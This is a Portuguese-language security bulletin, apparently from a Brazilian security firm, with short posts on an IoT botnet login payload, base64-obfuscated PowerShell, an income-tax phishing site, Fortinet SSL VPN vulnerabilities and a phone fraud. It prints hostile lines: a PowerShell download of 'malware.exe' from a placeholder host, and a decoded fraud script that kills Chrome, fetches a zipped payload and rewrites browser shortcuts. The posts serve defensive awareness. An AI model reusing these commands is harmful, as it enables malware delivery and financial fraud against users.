Vol. 1 No. 20250417-361 (2025)

Atenção aos IoTs

Yuri Augusto | yuri@cylo.com.br | 17/04/2025

Nos últimos dias tenho observado diversos bloqueios pelo IPS (intrusion prevention system) nos logs do firewall. A origem da comunicação apresentava variação, porém o payload era sempre o mesmo /boaform/admin/formLogin?username=adminisp&psd=adminisp.Ao investigar mais a fundo, verifiquei que se trata de um payload utilizado por algumas botnets para realizar ataques em dispositivos ONT.

Um artigo da LevelBlue, de 2021 [1], alerta sobre a botnet BotenaGO que utiliza diversos exploits, incluindo um que explora vulnerabilidades em servidores web Boa, a CVE-2020-8958. Uma rápida consulta ao Shodan mostrou que o IP atacante, sem muita surpresa, utiliza uma versão do webserver explorado pela BotenaGO.

Webserver utilizado pelo IP atacante.

Atualmente, o código do malware, está disponível na internet, podendo conter diversas variantes, uma vez que qualquer desenvolvedor mal intencionado pode ter acesso ao código e realizar alterações – o que pode acarretar em crescimento de novas ameaças a roteadores e dispositivos IoT.

Payloads inicializados no código fonte do malware, evidenciando ataques em IoTs e roteadores.
Fonte: LevelBlue [2]

Na imagem anterior, podemos observar uma função executada para diferentes modems, IoTs e roteadores, onde cada função carrega um exploit diferente. Apesar da botnet BotenaGO ser apenas um kit de exploit, ela pode facilitar o envio de malwares para dispositivos vulneráveis.

Finalizo com a recomendação essencial: seguir processos. Atualizações de segurança, atualizações de firmware e diminuir a exposição de dispositivos IoT na internet, podem diminuir consideravelmente o risco de infecção.

Referências

LevelBlue Labs. LevelBlue, 2021. Disponível em: https://levelblue.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits. Descrição: LevelBlue Labs finds new Golang malware (BotenaGo) targeting millions of routers and IoT devices with more than 30 exploits. Acesso em: 17, abril e 2025.

LevelBlue Labs. LevelBlue, 2021. Disponível em: https://levelblue.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github. Descrição: BotenaGo strikes again – malware source code uploaded to GitHub. Acesso em: 17, abril e 2025.

Vol. 1 No. 20250417-366 (2025)

Ataques obfuscados via PowerShell

Pedro Brandt Zanqueta | pedro@cylo.com.br |

Lidamos recentemente com um incidente onde uma estação realizava semanalmente a execução de um script PowerShell via tarefa agendada. Isso levantou uma dúvida interessante, porque as políticas do próprio PowerShell não bloquearia, a Microsoft desenvolveu a política de execução do PowerShell, recurso de segurança ao qual controla as condições sob as quais o PowerShell carrega arquivos de configuração e executa scripts.

Analisando a cadeia de execuções, identificamos que o comando está em base64, ao que nativamente o PowerShell realiza, com isso consegue dar um bypass nessa etapa de segurança a nível de sistema operacional.

Segue abaixo um exemplo da técnica informada:

$command = “Invoke-WebRequest http[:]//malicious[.]com -OutFile malware[.]exe”

$encodedCommand = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))

powershell -EncodedCommand $encodedCommand

Essa é uma técnica entre muitas que atacantes utilizam, a pergunta que devemos fazer é, suas ferramentas e seu time estão preparados para lidar com ela?

Referências:

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.5

Vol. 1 No. 20250415-321 (2025)

Phishing no Imposto de Renda

João Fuzinelli | joao@cylo.com.br | 15/04/2025

Com a chegada da necessidade da declaração brasileira de imposto de renda temos visto o início campanhas de phishing tentando persuadir pessoas físicas a realizarem pagamentos inadequados.

O e-mail leva o usuário para uma página falsa do governo brasileiro solicitando o CPF da pessoa.

Ao inserir os números do CPF o site falso inicia um carregamento como se estivesse fazendo uma busca a Receita Federal brasileira

Em seguida mostra uma p´´agina como se o CPF consultado estivesse devedor e em caso de não pagamento poderia ocasionar uma série de multas

Ao clicar no botão regularizar o site simula que está realizando os cálculos e gera um extrato do que deve ser pago

Ao pedir para gerar a Darf o site traz a data atual para pagamento e um contador regressivo impondo urgência

Até o exato momento 15-04-2025 21:02 o QRCode do pix não carregou e aparentemente os botões estão quebrados

Recomendamos atenção a ataques relacionados ao assunto, bem como tentativas de fraude por telefone

Vol. 1 No. 20250414-272 (2025)

Sobre POCs para ataques a dispositivos Fortinet

Adriano Cansian | adriano.cansian@unesp.br | 14/04/2025

Estamos cientes de pelo menos um agente de ameaça explorando vulnerabilidades importantes de execução remota de código (RCE) em produtos Fortinet, como FortiOS e FortiGate, que podem ser usadas para criar arquivos maliciosos ou explorar sistemas.

Estamos tratando aqui especificamente das vulnerabilidades catalogadas pela Fortinet como: FG-IR-22-398 (CVE-2022-42475), FG-IR-23-097 (CVE-2023-27997) e FG-IR-24-015 (CVE-2024-21762), todas relacionadas ao SSL VPN em dispositivos Fortinet.

Nesse ponto é importante observar que se o produto Fortinet não tem, e nunca teve, SSL VPN ativado, ele não é afetado por essas vulnerabilidades. Para determinar se um dispositivo Fortinet, como um FortiGate rodando FortiOS, tem ou teve o SSL VPN ativado é necessário fazer verificações na interface gráfica (GUI) ou na linha de comando (CLI) e, se julgar necessário, analisar logs ou configurações históricas.

Vamos analisar se há provas de conceito (PoCs – Proof Of Concept) públicas ou evidências de exploração para essas vulnerabilidades:

  • FG-IR-22-398 / CVE-2022-42475
    CVSS: 9,8 (Critical) – EPSS: 92,9% de chance de ataque (em 14/4/2025)
    Essa é uma vulnerabilidade crítica de estouro de buffer baseado em heap no FortiOS SSL VPN, permitindo execução remota de código (RCE) sem autenticação. A Fortinet confirmou exploração ativa em dezembro de 2022, com indicadores de comprometimento (IoCs) como arquivos maliciosos (ex.: /data/lib/libips.bak) e conexões a IPs suspeitos. Há PoC público disponível para essa vulnerabilidade. A exploração real sugere que atores avançados desenvolveram seus próprios métodos, possivelmente devido à sua complexidade e ao foco em alvos governamentais.

  • FG-IR-23-097 / CVE-2023-27997
    CVSS: 9,8 (Critical) – EPSS: 87,3% de chance de ataque (14/4/2025)
    Outro problema crítico de estouro de buffer no SSL VPN, também permitindo RCE sem autenticação. A Fortinet relatou exploração limitada em junho de 2023 e, presumivelmente, existe de uma PoC funcional, embora não amplamente divulgada. Um repositório no GitHub contém um exemplo de PoC que demonstra a corrupção da memória heap para executar código remoto. Esse PoC é funcional, mas requer adaptações específicas, indicando que atores de ameaça podem estar usando variantes para criar arquivos maliciosos ou backdoors.

  • FG-IR-24-015 / CVE-2024-21762:
    CVSS: 9,8 (Critical) – EPSS: 90,7% de chance de ataque (14/4/2025)
    Essa vulnerabilidade de escrita fora dos limites no FortiOS SSL VPN foi reportada como potencialmente explorada em fevereiro de 2024. A Fortinet alertou para ataques reais, mas não há PoC pública confirmada até agora. A exploração envolve requisições HTTP maliciosas, e a falta de um PoC público pode refletir a recente divulgação ou esforços para limitar a disseminação de exploits. A recomendação da Fortinet de desativar o SSL VPN como mitigação sugere que atores de ameaça podem estar usando essa falha para acesso inicial e implantação de payloads maliciosos.

As três vulnerabilidades são alvos atraentes para atores sofisticados devido à exposição do SSL VPN na internet. A criação de arquivos maliciosos, como backdoors ou implantes, é consistente com o comportamento observado em explorações de RCE, especialmente em FG-IR-22-398, onde malwares personalizados para FortiOS foram detectados. Embora PoCs públicos sejam limitados, a exploração ativa indica que grupos de ameaça possuem exploits funcionais, possivelmente compartilhados em fóruns privados ou desenvolvidos internamente.

RECOMENDAÇÃO:

Há PoCs públicas confirmadas para FG-IR-22-398 (CVE-2022-42475) e FG-IR-23-097 (CVE-2023-27997), mas para FG-IR-24-015, não há PoCs amplamente disponíveis, embora explorações reais tenham sido reportadas. Entretanto, atores específicos podem estar de posse de algum código de ataque, ou códigos de ataque podem se tornar disponíveis em algum momento próximo ou vindouro.

Por esse motivo, nossa recomendação é aplicar os patches mais recentes [1] e, se possível, desativar o SSL VPN (obviamente, caso a VPN não seja utilizada), além de monitorar sistemas por IoCs, como arquivos ou conexões suspeitas.

Para mais informações sobre o tratamento das vulnerabilidades relacionadas com SSL VPN em produtos Fortinet, por favor consulte [1].

Referências:

[1] Carl Windsor – “Analysis of Threat Actor Activity”. Fortinet. 10 de abril de 2025.

https://www.fortinet.com/blog/psirt-blogs/analysis-of-threat-actor-activity

Vol. 1 No. 20250411-252 (2025)

Importância de executar o básico bem-feito

João Paulo Gonsales | jgonsales@cylo.com.br | 11/04/2025

Recentemente participei de um treinamento em Segurança da Informação, ministrado por um experiente pesquisador na área de Cybersecurity, onde diversas reflexões foram levantadas e entre elas, a importância de mensurar os investimentos na área, por onde começar? O que seria mais importante, altos investimentos em ferramental ou investir em processos?

Acredito que para diminuir a superfície de ataque do ambiente, envolve mais do que investir no melhor firewall, ferramentas de endpoint ou um bom SOC. A falta de definição de uma política de segurança da informação, um plano de recuperação de desastre funcional ou uma governança na gestão de identidade (Acessos), aumentaria muito a superfície de ataque.

Inverter a ordem no seu planejamento, seria eficaz? Talvez, depende, mas baseado nos históricos de taticas utilizadas e exploradas por atacantes no ambiente, vulnerabilidades não somente estão relacionadas a patch de segurança ou investimento em ferramental, mas também, se aplica, a inexistência das políticas e processos bem definidos e novamente, que implementadas, diminuiria a superfície de ataque a ser explorada.

Essa reflexão originada pelo treinamento, me fez lembrar de uma frase que escutei a alguns anos de um prestador de serviços de tecnologia, “Fazemos o básico bem-feito”. A fala no momento não fez muito sentido, não era o que eu estava buscando no momento, mas hoje vejo que faz muito sentido, principalmente na área de Segurança da Informação.

Fazendo uma analogia com a frase “fazer o básico bem-feito”, com a inexistência dos processos citados acima, como iremos garantir uma boa implantação do ferramental. Acredito que faria sentido complementar a frase mencionada acima para “Fazer o básico bem-feito protege melhor que fazer um avançado mal configurado”.

Um bom exemplo de “fazer o básico”, poderíamos citar o processo de gestão de acesso , por exemplo, uma sanitização recorrente do serviço de Active Directory, onde a falta de gestão em itens como, contas de computador obsoletas , contas de usuário expiradas, contas de ex-funcionários ainda ativas, excesso de contas administrativas, permissões herdadas sem lógica, falta de políticas para correções de segurança do produto , aumentaria a superfície de ataque e o risco de segurança no ambiente.

Para iniciar esse processo de gestão de acesso no serviço de Active Directory, conseguimos bons resultados com a utilização de ferramentas nativas do sistema operacional, como por exemplo o Powershell e implementação de processos bem definidos na sua gestão.

Isso seria somente alguns pontos que se aplicarmos na rotina de gestão diariamente, conseguíramos mitigar diversos riscos no ambiente e a sua não implementação, prejudica diretamente a eficácia da gestão de acesos e compromete tanto a segurança quanto a governança da TI.

Podemos citar alguns ganhos com a realização da sanitização recorrente do AD, como :

– Redução de riscos de segurança – Contas abandonadas são portas abertas para ataques. Removê-las periodicamente reduz a superfície de ataque.

– Melhoria na governança e conformidade – Facilita auditorias e garante que apenas contas ativas e justificadas existam no ambiente.

– Eficiência operacional – Um AD mais enxuto melhora a performance, reduz a carga administrativa e evita erros em permissões e acessos.

– Monitoramento contínuo e ações preventivas – Rotinas de verificação ou a implementação de Dashboards , permitiriam identificar padrões de inatividade e agir proativamente.

 Seguir os processos bem definidos , usando o exemplo da utilização de scritps e ferramentas nativas, poderiamos definir que : scritps poweshell + recorrência(processos) = diminuição da superfície de ataque, segurança contínua e uma governança mais eficiente do ambiente.

 Esse é somente um exemplo claro do que chamamos de “básico bem-feito” na prática, onde com poucos recursos financeiros , a gestão de acesso se torna eficiente, sem a utilização de ferramentas caras, onde fazer o básico bem feito faz a diferença e melhora a postura de segurança, alinhando muitos ganhos na segurança e conformidade.

Deixo essa reflexão, que são situações rotineiras e de muita importância do analista, definir processos, seguir processos e fazer o básico bem-feito garante uma mudança positiva no ambiente.

Vol. 1 No. 20250404-122 (2025)

A Armadilha do Módulo Falso

João Fuzinelli | joao@cylo.com.br | 04/04/2025

Nas últimas semanas, deparamo-nos com uma fraude envolvendo uma entidade financeira, que ocorreu da seguinte maneira: por meio de uma ligação telefônica, o fraudador solicitava que a vítima acessasse o site abaixo:

O site entrava em um modo de ‘aguarde’ e, ao examinarmos o código, identificamos o seguinte caminho:

/diagnostico

O site sempre apresentava um erro de validação, pois o fraudador alegava, durante a conversa, que era necessário atualizar o módulo de segurança.

Ao clicar no botão ‘Instalar Módulo Mais Recente’, era iniciado o download de um arquivo .exe, que o navegador marcava como não confiável. Já no botão ‘Copiar Código de Segurança’, era fornecida uma linha de comando codificada em Base64. Ao realizar o decode, obtive o seguinte resultado em alguns blocos:

Força a parada do processo Chrome:

Stop-Process -Name “chrome” -Force

Instala um módigo do 7zip para powershell

If(-not(Get-InstalledModule 7Zip4Powershell -ErrorAction silentlycontinue)){
Install-Module 7Zip4Powershell -Confirm:$False -Force
}

Realiza o download de um arquivo denominado plugin.zip

Invoke-WebRequest “https:/XYZ[.]COM/download?file=plugin[.]zip” -OutFile “$env:APPDATA\plugin.zip”

Coloca o valor da senha em uma variavel para descomprimir o arquivo zip

$Secure_String_Pwd = ConvertTo-SecureString “@Wrs304093” -AsPlainText -Force

Cria um arquivo .lnk na área de trabalho

ForEach ($folder in $special_folders) {
If (([Environment]::GetFolderPath(“$folder”)) -ne “”) {
$path = [Environment]::GetFolderPath(“$folder”)
$shortcut_name = “\Google Chrome.lnk”
If ([System.IO.File]::Exists(“$($path)$($shortcut_name)”)) {
$obj = New-Object -comObject WScript.Shell;
$lnk = $obj.CreateShortcut(“$($path)$($shortcut_name)”);
$lnk.Arguments = “$arg”;
$lnk.Save();
}

Por fim, o site realizava o download do módulo de segurança original e dava continuidade ao processo, simulando uma atualização legítima. Estou monitorando as atividades do nosso servidor infectado para obter mais informações.